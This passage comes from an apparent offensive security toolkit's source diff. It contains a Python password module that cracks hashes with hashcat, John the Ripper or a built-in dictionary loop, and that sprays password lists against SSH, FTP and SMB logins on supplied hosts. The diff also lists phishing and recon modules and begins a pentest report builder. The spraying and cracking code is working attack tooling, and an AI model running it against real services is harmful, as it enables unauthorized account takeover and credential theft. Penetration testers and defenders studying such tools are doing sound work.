return 'low' # CRC32 vs short hex
return 'medium'
def identify_batch(self, hashes: List[str]) -> List[dict]:
"""Identify types for multiple hashes."""
results = []
for h in hashes:
h = h.strip()
if not h:
continue
ids = self.identify_hash(h)
results.append({'hash': h, 'types': ids})
return results
# ── Hash Cracking ─────────────────────────────────────────────────────
def crack_hash(self, hash_str: str, hash_type: str = 'auto',
wordlist: str = '', attack_mode: str = 'dictionary',
rules: str = '', mask: str = '',
tool: str = 'auto') -> dict:
"""Start a hash cracking job.
attack_mode: 'dictionary', 'brute_force', 'mask', 'hybrid'
tool: 'hashcat', 'john', 'auto' (try hashcat first, then john)
"""
hash_str = hash_str.strip()
if not hash_str:
return {'ok': False, 'error': 'No hash provided'}
# Auto-detect hash type if needed
if hash_type == 'auto':
ids = self.identify_hash(hash_str)
if not ids:
return {'ok': False, 'error': 'Could not identify hash type'}
hash_type = ids[0]['name']
# Find cracking tool
hashcat = find_tool('hashcat')
john = find_tool('john')
if tool == 'auto':
tool = 'hashcat' if hashcat else ('john' if john else None)
elif tool == 'hashcat' and not hashcat:
return {'ok': False, 'error': 'hashcat not found'}
elif tool == 'john' and not john:
return {'ok': False, 'error': 'john not found'}
if not tool:
# Fallback: Python-based dictionary attack (slow but works)
return self._python_crack(hash_str, hash_type, wordlist)
# Default wordlist
if not wordlist:
wordlist = self._find_default_wordlist()
job_id = f'crack_{int(time.time())}_{secrets.token_hex(4)}'
if tool == 'hashcat':
return self._crack_hashcat(job_id, hash_str, hash_type,
wordlist, attack_mode, rules, mask)
else:
return self._crack_john(job_id, hash_str, hash_type,
wordlist, attack_mode, rules, mask)
def _crack_hashcat(self, job_id: str, hash_str: str, hash_type: str,
wordlist: str, attack_mode: str, rules: str,
mask: str) -> dict:
"""Crack using hashcat."""
hashcat = find_tool('hashcat')
# Get hashcat mode
mode = 0
for sig in HASH_SIGNATURES:
if sig.name == hash_type:
mode = sig.hashcat_mode
break
# Write hash to temp file
hash_file = os.path.join(self._results_dir, f'{job_id}.hash')
out_file = os.path.join(self._results_dir, f'{job_id}.pot')
with open(hash_file, 'w') as f:
f.write(hash_str + '\n')
cmd = [hashcat, '-m', str(mode), hash_file, '-o', out_file, '--potfile-disable']
attack_modes = {'dictionary': '0', 'brute_force': '3', 'mask': '3', 'hybrid': '6'}
cmd.extend(['-a', attack_modes.get(attack_mode, '0')])
if attack_mode in ('dictionary', 'hybrid') and wordlist:
cmd.append(wordlist)
if attack_mode in ('brute_force', 'mask') and mask:
cmd.append(mask)
elif attack_mode == 'brute_force' and not mask:
cmd.append('?a?a?a?a?a?a?a?a') # Default 8-char brute force
if rules:
cmd.extend(['-r', rules])
result_holder = {'result': None, 'done': False, 'process': None}
self._active_jobs[job_id] = result_holder
def run_crack():
try:
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
result_holder['process'] = None
cracked = ''
if os.path.exists(out_file):
with open(out_file, 'r') as f:
cracked = f.read().strip()
result_holder['result'] = {
'ok': True,
'cracked': cracked,
'output': proc.stdout[-2000:] if proc.stdout else '',
'returncode': proc.returncode,
}
except subprocess.TimeoutExpired:
result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'}
except Exception as e:
result_holder['result'] = {'ok': False, 'error': str(e)}
finally:
result_holder['done'] = True
threading.Thread(target=run_crack, daemon=True).start()
return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with hashcat (mode {mode})'}
def _crack_john(self, job_id: str, hash_str: str, hash_type: str,
wordlist: str, attack_mode: str, rules: str,
mask: str) -> dict:
"""Crack using John the Ripper."""
john = find_tool('john')
fmt = ''
for sig in HASH_SIGNATURES:
if sig.name == hash_type:
fmt = sig.john_format
break
hash_file = os.path.join(self._results_dir, f'{job_id}.hash')
with open(hash_file, 'w') as f:
f.write(hash_str + '\n')
cmd = [john, hash_file]
if fmt:
cmd.extend(['--format=' + fmt])
if wordlist and attack_mode == 'dictionary':
cmd.extend(['--wordlist=' + wordlist])
if rules:
cmd.extend(['--rules=' + rules])
if attack_mode in ('mask', 'brute_force') and mask:
cmd.extend(['--mask=' + mask])
result_holder = {'result': None, 'done': False}
self._active_jobs[job_id] = result_holder
def run_crack():
try:
proc = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
# Get cracked results
show = subprocess.run([john, '--show', hash_file],
capture_output=True, text=True, timeout=10)
result_holder['result'] = {
'ok': True,
'cracked': show.stdout.strip() if show.stdout else '',
'output': proc.stdout[-2000:] if proc.stdout else '',
'returncode': proc.returncode,
}
except subprocess.TimeoutExpired:
result_holder['result'] = {'ok': False, 'error': 'Crack timed out (1 hour)'}
except Exception as e:
result_holder['result'] = {'ok': False, 'error': str(e)}
finally:
result_holder['done'] = True
threading.Thread(target=run_crack, daemon=True).start()
return {'ok': True, 'job_id': job_id, 'message': f'Cracking started with john ({fmt or "auto"})'}
def _python_crack(self, hash_str: str, hash_type: str,
wordlist: str) -> dict:
"""Fallback pure-Python dictionary crack for common hash types."""
algo_map = {
'MD5': 'md5', 'SHA-1': 'sha1', 'SHA-256': 'sha256',
'SHA-512': 'sha512', 'SHA-224': 'sha224', 'SHA-384': 'sha384',
}
algo = algo_map.get(hash_type)
if not algo:
return {'ok': False, 'error': f'Python cracker does not support {hash_type}. Install hashcat or john.'}
if not wordlist:
wordlist = self._find_default_wordlist()
if not wordlist or not os.path.exists(wordlist):
return {'ok': False, 'error': 'No wordlist available'}
hash_lower = hash_str.lower()
tried = 0
try:
with open(wordlist, 'r', encoding='utf-8', errors='ignore') as f:
for line in f:
word = line.strip()
if not word:
continue
h = hashlib.new(algo, word.encode('utf-8')).hexdigest()
tried += 1
if h == hash_lower:
return {
'ok': True,
'cracked': f'{hash_str}:{word}',
'plaintext': word,
'tried': tried,
'message': f'Cracked! Password: {word}',
}
if tried >= 10_000_000:
break
except Exception as e:
return {'ok': False, 'error': str(e)}
return {'ok': True, 'cracked': '', 'tried': tried,
'message': f'Not cracked. Tried {tried:,} candidates.'}
def get_crack_status(self, job_id: str) -> dict:
"""Check status of a cracking job."""
holder = self._active_jobs.get(job_id)
if not holder:
return {'ok': False, 'error': 'Job not found'}
if not holder['done']:
return {'ok': True, 'done': False, 'message': 'Cracking in progress...'}
self._active_jobs.pop(job_id, None)
return {'ok': True, 'done': True, **holder['result']}
# ── Password Generation ───────────────────────────────────────────────
def generate_password(self, length: int = 16, count: int = 1,
uppercase: bool = True, lowercase: bool = True,
digits: bool = True, symbols: bool = True,
exclude_chars: str = '',
pattern: str = '') -> List[str]:
"""Generate secure random passwords."""
if pattern:
return [self._generate_from_pattern(pattern) for _ in range(count)]
charset = ''
if uppercase:
charset += string.ascii_uppercase
if lowercase:
charset += string.ascii_lowercase
if digits:
charset += string.digits
if symbols:
charset += '!@#$%^&*()-_=+[]{}|;:,.<>?'
if exclude_chars:
charset = ''.join(c for c in charset if c not in exclude_chars)
if not charset:
charset = string.ascii_letters + string.digits
length = max(4, min(length, 128))
count = max(1, min(count, 100))
passwords = []
for _ in range(count):
pw = ''.join(secrets.choice(charset) for _ in range(length))
passwords.append(pw)
return passwords
def _generate_from_pattern(self, pattern: str) -> str:
"""Generate password from pattern.
?u = uppercase, ?l = lowercase, ?d = digit, ?s = symbol, ?a = any
"""
result = []
i = 0
while i < len(pattern):
if pattern[i] == '?' and i + 1 < len(pattern):
c = pattern[i + 1]
if c == 'u':
result.append(secrets.choice(string.ascii_uppercase))
elif c == 'l':
result.append(secrets.choice(string.ascii_lowercase))
elif c == 'd':
result.append(secrets.choice(string.digits))
elif c == 's':
result.append(secrets.choice('!@#$%^&*()-_=+'))
elif c == 'a':
result.append(secrets.choice(
string.ascii_letters + string.digits + '!@#$%^&*'))
else:
result.append(pattern[i:i+2])
i += 2
else:
result.append(pattern[i])
i += 1
return ''.join(result)
# ── Password Policy Audit ─────────────────────────────────────────────
def audit_password(self, password: str) -> dict:
"""Audit a password against common policies and calculate entropy."""
import math
checks = {
'length_8': len(password) >= 8,
'length_12': len(password) >= 12,
'length_16': len(password) >= 16,
'has_uppercase': bool(re.search(r'[A-Z]', password)),
'has_lowercase': bool(re.search(r'[a-z]', password)),
'has_digit': bool(re.search(r'[0-9]', password)),
'has_symbol': bool(re.search(r'[^A-Za-z0-9]', password)),
'no_common_patterns': not self._has_common_patterns(password),
'no_sequential': not self._has_sequential(password),
'no_repeated': not self._has_repeated(password),
}
# Calculate entropy
charset_size = 0
if re.search(r'[a-z]', password):
charset_size += 26
if re.search(r'[A-Z]', password):
charset_size += 26
if re.search(r'[0-9]', password):
charset_size += 10
if re.search(r'[^A-Za-z0-9]', password):
charset_size += 32
entropy = len(password) * math.log2(charset_size) if charset_size > 0 else 0
# Strength rating
if entropy >= 80 and all(checks.values()):
strength = 'very_strong'
elif entropy >= 60 and checks['length_12']:
strength = 'strong'
elif entropy >= 40 and checks['length_8']:
strength = 'medium'
elif entropy >= 28:
strength = 'weak'
else:
strength = 'very_weak'
return {
'length': len(password),
'entropy': round(entropy, 1),
'strength': strength,
'checks': checks,
'charset_size': charset_size,
}
def _has_common_patterns(self, pw: str) -> bool:
common = ['password', '123456', 'qwerty', 'abc123', 'letmein',
'admin', 'welcome', 'monkey', 'dragon', 'master',
'login', 'princess', 'football', 'shadow', 'sunshine',
'trustno1', 'iloveyou', 'batman', 'access', 'hello']
pl = pw.lower()
return any(c in pl for c in common)
def _has_sequential(self, pw: str) -> bool:
for i in range(len(pw) - 2):
if (ord(pw[i]) + 1 == ord(pw[i+1]) == ord(pw[i+2]) - 1):
return True
return False
def _has_repeated(self, pw: str) -> bool:
for i in range(len(pw) - 2):
if pw[i] == pw[i+1] == pw[i+2]:
return True
return False
# ── Credential Spray / Stuff ──────────────────────────────────────────
def credential_spray(self, targets: List[dict], passwords: List[str],
protocol: str = 'ssh', threads: int = 4,
delay: float = 1.0) -> dict:
"""Spray passwords against target services.
targets: [{'host': '...', 'port': 22, 'username': 'admin'}, ...]
protocol: 'ssh', 'ftp', 'smb', 'http_basic', 'http_form'
"""
if not targets or not passwords:
return {'ok': False, 'error': 'Targets and passwords required'}
job_id = f'spray_{int(time.time())}_{secrets.token_hex(4)}'
result_holder = {
'done': False,
'results': [],
'total': len(targets) * len(passwords),
'tested': 0,
'found': [],
}
self._active_jobs[job_id] = result_holder
def do_spray():
import socket as sock_mod
for target in targets:
host = target.get('host', '')
port = target.get('port', 0)
username = target.get('username', '')
for pw in passwords:
if protocol == 'ssh':
ok = self._test_ssh(host, port or 22, username, pw)
elif protocol == 'ftp':
ok = self._test_ftp(host, port or 21, username, pw)
elif protocol == 'smb':
ok = self._test_smb(host, port or 445, username, pw)
else:
ok = False
result_holder['tested'] += 1
if ok:
cred = {'host': host, 'port': port, 'username': username,
'password': pw, 'protocol': protocol}
result_holder['found'].append(cred)
time.sleep(delay)
result_holder['done'] = True
threading.Thread(target=do_spray, daemon=True).start()
return {'ok': True, 'job_id': job_id,
'message': f'Spray started: {len(targets)} targets × {len(passwords)} passwords'}
def _test_ssh(self, host: str, port: int, user: str, pw: str) -> bool:
try:
import paramiko
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(host, port=port, username=user, password=pw,
timeout=5, look_for_keys=False, allow_agent=False)
client.close()
return True
except Exception:
return False
def _test_ftp(self, host: str, port: int, user: str, pw: str) -> bool:
try:
import ftplib
ftp = ftplib.FTP()
ftp.connect(host, port, timeout=5)
ftp.login(user, pw)
ftp.quit()
return True
except Exception:
return False
def _test_smb(self, host: str, port: int, user: str, pw: str) -> bool:
try:
from impacket.smbconnection import SMBConnection
conn = SMBConnection(host, host, sess_port=port)
conn.login(user, pw)
conn.close()
return True
except Exception:
return False
def get_spray_status(self, job_id: str) -> dict:
holder = self._active_jobs.get(job_id)
if not holder:
return {'ok': False, 'error': 'Job not found'}
return {
'ok': True,
'done': holder['done'],
'tested': holder['tested'],
'total': holder['total'],
'found': holder['found'],
}
# ── Wordlist Management ───────────────────────────────────────────────
def list_wordlists(self) -> List[dict]:
"""List available wordlists."""
results = []
for f in Path(self._wordlists_dir).glob('*'):
if f.is_file():
size = f.stat().st_size
line_count = 0
try:
with open(f, 'r', encoding='utf-8', errors='ignore') as fh:
for _ in fh:
line_count += 1
if line_count > 10_000_000:
break
except Exception:
pass
results.append({
'name': f.name,
'path': str(f),
'size': size,
'size_human': self._human_size(size),
'lines': line_count,
})
# Also check common system locations
system_lists = [
'/usr/share/wordlists/rockyou.txt',
'/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt',
'/usr/share/wordlists/fasttrack.txt',
]
for path in system_lists:
if os.path.exists(path) and not any(r['path'] == path for r in results):
size = os.path.getsize(path)
results.append({
'name': os.path.basename(path),
'path': path,
'size': size,
'size_human': self._human_size(size),
'lines': -1, # Don't count for system lists
'system': True,
})
return results
def _find_default_wordlist(self) -> str:
"""Find the best available wordlist."""
# Check our wordlists dir first
for f in Path(self._wordlists_dir).glob('*'):
if f.is_file() and f.stat().st_size > 100:
return str(f)
# System locations
candidates = [
'/usr/share/wordlists/rockyou.txt',
'/usr/share/wordlists/fasttrack.txt',
'/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt',
]
for c in candidates:
if os.path.exists(c):
return c
return ''
def upload_wordlist(self, filename: str, data: bytes) -> dict:
"""Save an uploaded wordlist."""
safe_name = re.sub(r'[^a-zA-Z0-9._-]', '_', filename)
path = os.path.join(self._wordlists_dir, safe_name)
with open(path, 'wb') as f:
f.write(data)
return {'ok': True, 'path': path, 'name': safe_name}
def delete_wordlist(self, name: str) -> dict:
path = os.path.join(self._wordlists_dir, name)
if os.path.exists(path):
os.remove(path)
return {'ok': True}
return {'ok': False, 'error': 'Wordlist not found'}
# ── Hash Generation (for testing) ─────────────────────────────────────
def hash_string(self, plaintext: str, algorithm: str = 'md5') -> dict:
"""Hash a string with a given algorithm."""
algo_map = {
'md5': hashlib.md5,
'sha1': hashlib.sha1,
'sha224': hashlib.sha224,
'sha256': hashlib.sha256,
'sha384': hashlib.sha384,
'sha512': hashlib.sha512,
}
fn = algo_map.get(algorithm.lower())
if not fn:
return {'ok': False, 'error': f'Unsupported algorithm: {algorithm}'}
h = fn(plaintext.encode('utf-8')).hexdigest()
return {'ok': True, 'hash': h, 'algorithm': algorithm, 'plaintext': plaintext}
# ── Tool Detection ────────────────────────────────────────────────────
def get_tools_status(self) -> dict:
"""Check which cracking tools are available."""
return {
'hashcat': bool(find_tool('hashcat')),
'john': bool(find_tool('john')),
'hydra': bool(find_tool('hydra')),
'ncrack': bool(find_tool('ncrack')),
}
@staticmethod
def _human_size(size: int) -> str:
for unit in ('B', 'KB', 'MB', 'GB'):
if size < 1024:
return f'{size:.1f} {unit}'
size /= 1024
return f'{size:.1f} TB'
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_password_toolkit() -> PasswordToolkit:
global _instance
if _instance is None:
with _lock:
if _instance is None:
_instance = PasswordToolkit()
return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
"""Interactive CLI for Password Toolkit."""
svc = get_password_toolkit()
while True:
print("\n╔═══════════════════════════════════════╗")
print("║ PASSWORD TOOLKIT ║")
print("╠═══════════════════════════════════════╣")
print("║ 1 — Identify Hash ║")
print("║ 2 — Crack Hash ║")
print("║ 3 — Generate Passwords ║")
print("║ 4 — Audit Password Strength ║")
print("║ 5 — Hash a String ║")
print("║ 6 — Wordlist Management ║")
print("║ 7 — Tool Status ║")
print("║ 0 — Back ║")
print("╚═══════════════════════════════════════╝")
choice = input("\n Select: ").strip()
if choice == '0':
break
elif choice == '1':
h = input(" Hash: ").strip()
if not h:
continue
results = svc.identify_hash(h)
if results:
print(f"\n Possible types ({len(results)}):")
for r in results:
print(f" [{r['confidence'].upper():6s}] {r['name']}"
f" (hashcat: {r['hashcat_mode']}, john: {r['john_format']})")
else:
print(" No matching hash types found.")
elif choice == '2':
h = input(" Hash: ").strip()
wl = input(" Wordlist (empty=default): ").strip()
result = svc.crack_hash(h, wordlist=wl)
if result.get('job_id'):
print(f" {result['message']}")
print(" Waiting...")
while True:
time.sleep(2)
s = svc.get_crack_status(result['job_id'])
if s.get('done'):
if s.get('cracked'):
print(f"\n CRACKED: {s['cracked']}")
else:
print(f"\n Not cracked. {s.get('message', '')}")
break
elif result.get('cracked'):
print(f"\n CRACKED: {result['cracked']}")
else:
print(f" {result.get('message', result.get('error', ''))}")
elif choice == '3':
length = int(input(" Length (default 16): ").strip() or '16')
count = int(input(" Count (default 5): ").strip() or '5')
passwords = svc.generate_password(length=length, count=count)
print("\n Generated passwords:")
for pw in passwords:
audit = svc.audit_password(pw)
print(f" {pw} [{audit['strength']}] {audit['entropy']} bits")
elif choice == '4':
pw = input(" Password: ").strip()
if not pw:
continue
audit = svc.audit_password(pw)
print(f"\n Strength: {audit['strength']}")
print(f" Entropy: {audit['entropy']} bits")
print(f" Length: {audit['length']}")
print(f" Charset: {audit['charset_size']} characters")
for check, passed in audit['checks'].items():
mark = '\033[92m✓\033[0m' if passed else '\033[91m✗\033[0m'
print(f" {mark} {check}")
elif choice == '5':
text = input(" Plaintext: ").strip()
algo = input(" Algorithm (md5/sha1/sha256/sha512): ").strip() or 'sha256'
r = svc.hash_string(text, algo)
if r['ok']:
print(f" {r['algorithm']}: {r['hash']}")
else:
print(f" Error: {r['error']}")
elif choice == '6':
wls = svc.list_wordlists()
if wls:
print(f"\n Wordlists ({len(wls)}):")
for w in wls:
sys_tag = ' [system]' if w.get('system') else ''
print(f" {w['name']}{w['size_human']}{sys_tag}")
else:
print(" No wordlists found.")
elif choice == '7':
tools = svc.get_tools_status()
print("\n Tool Status:")
for tool, available in tools.items():
mark = '\033[92m✓\033[0m' if available else '\033[91m✗\033[0m'
print(f" {mark} {tool}")

1489
modules/phishmail.py Normal file

File diff suppressed because it is too large Load Diff

1669
modules/pineapple.py Normal file

File diff suppressed because it is too large Load Diff

2043
modules/rcs_tools.py Normal file

File diff suppressed because it is too large Load Diff

2191
modules/recon.py Normal file

File diff suppressed because it is too large Load Diff

499
modules/report_engine.py Normal file
View File

@@ -0,0 +1,499 @@
"""AUTARCH Reporting Engine
Structured pentest report builder with findings, CVSS scoring, evidence,
and export to HTML/Markdown/JSON.
"""
DESCRIPTION = "Pentest report builder & exporter"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import json
import time
import uuid
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
from dataclasses import dataclass, field, asdict
import threading
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Finding Severity & CVSS ──────────────────────────────────────────────────
SEVERITY_MAP = {
'critical': {'color': '#dc2626', 'score_range': '9.0-10.0', 'order': 0},
'high': {'color': '#ef4444', 'score_range': '7.0-8.9', 'order': 1},
'medium': {'color': '#f59e0b', 'score_range': '4.0-6.9', 'order': 2},
'low': {'color': '#22c55e', 'score_range': '0.1-3.9', 'order': 3},
'info': {'color': '#6366f1', 'score_range': '0.0', 'order': 4},
}
FINDING_TEMPLATES = [
{
'id': 'sqli',
'title': 'SQL Injection',
'severity': 'critical',
'cvss': 9.8,
'description': 'The application is vulnerable to SQL injection, allowing an attacker to manipulate database queries.',
'impact': 'Complete database compromise, data exfiltration, authentication bypass, potential remote code execution.',
'remediation': 'Use parameterized queries/prepared statements. Implement input validation and WAF rules.',
'references': ['OWASP Top 10: A03:2021', 'CWE-89'],
},
{
'id': 'xss',
'title': 'Cross-Site Scripting (XSS)',
'severity': 'high',
'cvss': 7.5,
'description': 'The application reflects user input without proper sanitization, enabling script injection.',
'impact': 'Session hijacking, credential theft, defacement, malware distribution.',
'remediation': 'Encode all output, implement Content-Security-Policy, use framework auto-escaping.',
'references': ['OWASP Top 10: A03:2021', 'CWE-79'],
},
{
'id': 'broken_auth',
'title': 'Broken Authentication',
'severity': 'critical',
'cvss': 9.1,
'description': 'Authentication mechanisms can be bypassed or abused to gain unauthorized access.',
'impact': 'Account takeover, privilege escalation, unauthorized data access.',
'remediation': 'Implement MFA, rate limiting, secure session management, strong password policies.',
'references': ['OWASP Top 10: A07:2021', 'CWE-287'],
},
{
'id': 'idor',
'title': 'Insecure Direct Object Reference (IDOR)',
'severity': 'high',
'cvss': 7.5,
'description': 'The application exposes internal object references that can be manipulated to access unauthorized resources.',
'impact': 'Unauthorized access to other users\' data, horizontal privilege escalation.',
'remediation': 'Implement proper access control checks, use indirect references.',
'references': ['OWASP Top 10: A01:2021', 'CWE-639'],
},
{
'id': 'missing_headers',
'title': 'Missing Security Headers',
'severity': 'low',
'cvss': 3.1,
'description': 'The application does not implement recommended security headers.',
'impact': 'Increased attack surface for clickjacking, MIME sniffing, and XSS attacks.',
'remediation': 'Implement CSP, X-Frame-Options, X-Content-Type-Options, HSTS headers.',
'references': ['OWASP Secure Headers Project'],
},
{
'id': 'weak_ssl',
'title': 'Weak SSL/TLS Configuration',
'severity': 'medium',
'cvss': 5.3,
'description': 'The server supports weak SSL/TLS protocols or cipher suites.',
'impact': 'Potential for traffic interception via downgrade attacks.',
'remediation': 'Disable TLS 1.0/1.1, remove weak ciphers, enable HSTS.',
'references': ['CWE-326', 'NIST SP 800-52'],
},
{
'id': 'info_disclosure',
'title': 'Information Disclosure',
'severity': 'medium',
'cvss': 5.0,
'description': 'The application reveals sensitive information such as server versions, stack traces, or internal paths.',
'impact': 'Aids attackers in fingerprinting and planning targeted attacks.',
'remediation': 'Remove version headers, disable debug modes, implement custom error pages.',
'references': ['CWE-200'],
},
{
'id': 'default_creds',
'title': 'Default Credentials',
'severity': 'critical',
'cvss': 9.8,
'description': 'The system uses default or well-known credentials that have not been changed.',
'impact': 'Complete system compromise with minimal effort.',
'remediation': 'Enforce password change on first login, remove default accounts.',
'references': ['CWE-798'],
},
{
'id': 'eternalblue',
'title': 'MS17-010 (EternalBlue)',
'severity': 'critical',
'cvss': 9.8,
'description': 'The target is vulnerable to the EternalBlue SMB exploit (MS17-010).',
'impact': 'Remote code execution with SYSTEM privileges, wormable exploit.',
'remediation': 'Apply Microsoft patch MS17-010, disable SMBv1.',
'references': ['CVE-2017-0144', 'MS17-010'],
},
{
'id': 'open_ports',
'title': 'Unnecessary Open Ports',
'severity': 'low',
'cvss': 3.0,
'description': 'The target exposes network services that are not required for operation.',
'impact': 'Increased attack surface, potential exploitation of exposed services.',
'remediation': 'Close unnecessary ports, implement firewall rules, use network segmentation.',
'references': ['CIS Benchmarks'],
},
]
# ── Report Engine ─────────────────────────────────────────────────────────────
class ReportEngine:
"""Pentest report builder with findings management and export."""
def __init__(self):
self._data_dir = os.path.join(get_data_dir(), 'reports')
os.makedirs(self._data_dir, exist_ok=True)
# ── Report CRUD ───────────────────────────────────────────────────────
def create_report(self, title: str, client: str = '',
scope: str = '', methodology: str = '') -> dict:
"""Create a new report."""
report_id = str(uuid.uuid4())[:8]
report = {
'id': report_id,
'title': title,
'client': client,
'scope': scope,
'methodology': methodology or 'OWASP Testing Guide v4.2 / PTES',
'executive_summary': '',
'findings': [],
'created_at': datetime.now(timezone.utc).isoformat(),
'updated_at': datetime.now(timezone.utc).isoformat(),
'status': 'draft',
'author': 'AUTARCH',
}
self._save_report(report)
return {'ok': True, 'report': report}
def get_report(self, report_id: str) -> Optional[dict]:
path = os.path.join(self._data_dir, f'{report_id}.json')
if not os.path.exists(path):
return None
with open(path, 'r') as f:
return json.load(f)
def update_report(self, report_id: str, updates: dict) -> dict:
report = self.get_report(report_id)
if not report:
return {'ok': False, 'error': 'Report not found'}
for k, v in updates.items():
if k in report and k not in ('id', 'created_at'):
report[k] = v
report['updated_at'] = datetime.now(timezone.utc).isoformat()
self._save_report(report)
return {'ok': True, 'report': report}
def delete_report(self, report_id: str) -> dict:
path = os.path.join(self._data_dir, f'{report_id}.json')
if os.path.exists(path):
os.remove(path)
return {'ok': True}
return {'ok': False, 'error': 'Report not found'}
def list_reports(self) -> List[dict]:
reports = []
for f in Path(self._data_dir).glob('*.json'):
try:
with open(f, 'r') as fh:
r = json.load(fh)
reports.append({
'id': r['id'],
'title': r['title'],
'client': r.get('client', ''),
'status': r.get('status', 'draft'),
'findings_count': len(r.get('findings', [])),
'created_at': r.get('created_at', ''),
'updated_at': r.get('updated_at', ''),
})
except Exception:
continue
reports.sort(key=lambda r: r.get('updated_at', ''), reverse=True)
return reports
# ── Finding Management ────────────────────────────────────────────────
def add_finding(self, report_id: str, finding: dict) -> dict:
report = self.get_report(report_id)
if not report:
return {'ok': False, 'error': 'Report not found'}
finding['id'] = str(uuid.uuid4())[:8]
finding.setdefault('severity', 'medium')
finding.setdefault('cvss', 5.0)
finding.setdefault('status', 'open')
finding.setdefault('evidence', [])
report['findings'].append(finding)
report['updated_at'] = datetime.now(timezone.utc).isoformat()
self._save_report(report)
return {'ok': True, 'finding': finding}
def update_finding(self, report_id: str, finding_id: str,
updates: dict) -> dict:
report = self.get_report(report_id)
if not report:
return {'ok': False, 'error': 'Report not found'}
for f in report['findings']:
if f['id'] == finding_id:
for k, v in updates.items():
if k != 'id':
f[k] = v
report['updated_at'] = datetime.now(timezone.utc).isoformat()
self._save_report(report)
return {'ok': True, 'finding': f}
return {'ok': False, 'error': 'Finding not found'}
def delete_finding(self, report_id: str, finding_id: str) -> dict:
report = self.get_report(report_id)
if not report:
return {'ok': False, 'error': 'Report not found'}
report['findings'] = [f for f in report['findings']
if f['id'] != finding_id]
report['updated_at'] = datetime.now(timezone.utc).isoformat()
self._save_report(report)
return {'ok': True}
def get_finding_templates(self) -> List[dict]:
return FINDING_TEMPLATES
# ── Export ────────────────────────────────────────────────────────────
def export_html(self, report_id: str) -> Optional[str]:
"""Export report as styled HTML."""
report = self.get_report(report_id)
if not report:
return None
findings_html = ''
sorted_findings = sorted(report.get('findings', []),
key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5))
for i, f in enumerate(sorted_findings, 1):
sev = f.get('severity', 'info')
color = SEVERITY_MAP.get(sev, {}).get('color', '#666')
findings_html += f'''
<div class="finding">
<h3>{i}. {_esc(f.get('title', 'Untitled'))}</h3>
<div class="finding-meta">
<span class="severity" style="background:{color}">{sev.upper()}</span>
<span>CVSS: {f.get('cvss', 'N/A')}</span>
<span>Status: {f.get('status', 'open')}</span>
</div>
<h4>Description</h4><p>{_esc(f.get('description', ''))}</p>
<h4>Impact</h4><p>{_esc(f.get('impact', ''))}</p>
<h4>Remediation</h4><p>{_esc(f.get('remediation', ''))}</p>
{'<h4>Evidence</h4><pre>' + _esc(chr(10).join(f.get('evidence', []))) + '</pre>' if f.get('evidence') else ''}
{'<h4>References</h4><ul>' + ''.join('<li>' + _esc(r) + '</li>' for r in f.get('references', [])) + '</ul>' if f.get('references') else ''}
</div>'''
# Summary stats
severity_counts = {}
for f in report.get('findings', []):
s = f.get('severity', 'info')
severity_counts[s] = severity_counts.get(s, 0) + 1
summary_html = '<div class="severity-summary">'
for sev in ['critical', 'high', 'medium', 'low', 'info']:
count = severity_counts.get(sev, 0)
color = SEVERITY_MAP.get(sev, {}).get('color', '#666')
summary_html += f'<div class="sev-box" style="border-color:{color}"><span class="sev-count" style="color:{color}">{count}</span><span class="sev-label">{sev.upper()}</span></div>'
summary_html += '</div>'
html = f'''<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>{_esc(report.get('title', 'Report'))}</title>
<style>
body{{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',sans-serif;max-width:900px;margin:0 auto;padding:40px;color:#1a1a2e;line-height:1.6}}
h1{{color:#0f1117;border-bottom:3px solid #6366f1;padding-bottom:10px}}
h2{{color:#333;margin-top:2rem}}
.meta{{color:#666;font-size:0.9rem;margin:1rem 0}}
.finding{{border:1px solid #ddd;border-radius:8px;padding:1.5rem;margin:1rem 0;page-break-inside:avoid}}
.finding h3{{margin-top:0;color:#1a1a2e}}
.finding h4{{color:#555;margin:1rem 0 0.3rem;font-size:0.95rem}}
.finding-meta{{display:flex;gap:1rem;margin:0.5rem 0}}
.severity{{color:#fff;padding:2px 10px;border-radius:4px;font-size:0.8rem;font-weight:700}}
pre{{background:#f5f5f5;padding:1rem;border-radius:4px;overflow-x:auto;font-size:0.85rem}}
.severity-summary{{display:flex;gap:1rem;margin:1.5rem 0}}
.sev-box{{border:2px solid;border-radius:8px;padding:0.75rem 1.5rem;text-align:center}}
.sev-count{{font-size:1.5rem;font-weight:700;display:block}}
.sev-label{{font-size:0.7rem;text-transform:uppercase;letter-spacing:0.05em}}
.footer{{margin-top:3rem;padding-top:1rem;border-top:1px solid #ddd;font-size:0.8rem;color:#999}}
</style></head><body>
<h1>{_esc(report.get('title', 'Penetration Test Report'))}</h1>
<div class="meta">
<div><strong>Client:</strong> {_esc(report.get('client', 'N/A'))}</div>
<div><strong>Date:</strong> {report.get('created_at', '')[:10]}</div>
<div><strong>Author:</strong> {_esc(report.get('author', 'AUTARCH'))}</div>
<div><strong>Status:</strong> {report.get('status', 'draft').upper()}</div>
</div>
<h2>Executive Summary</h2>
<p>{_esc(report.get('executive_summary', 'No executive summary provided.'))}</p>
<h2>Scope</h2>
<p>{_esc(report.get('scope', 'No scope defined.'))}</p>
<h2>Methodology</h2>
<p>{_esc(report.get('methodology', ''))}</p>
<h2>Findings Overview</h2>
{summary_html}
<h2>Detailed Findings</h2>
{findings_html if findings_html else '<p>No findings recorded.</p>'}
<div class="footer">
Generated by AUTARCH Security Platform — {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M UTC')}
</div>
</body></html>'''
return html
def export_markdown(self, report_id: str) -> Optional[str]:
"""Export report as Markdown."""
report = self.get_report(report_id)
if not report:
return None
md = f"# {report.get('title', 'Report')}\n\n"
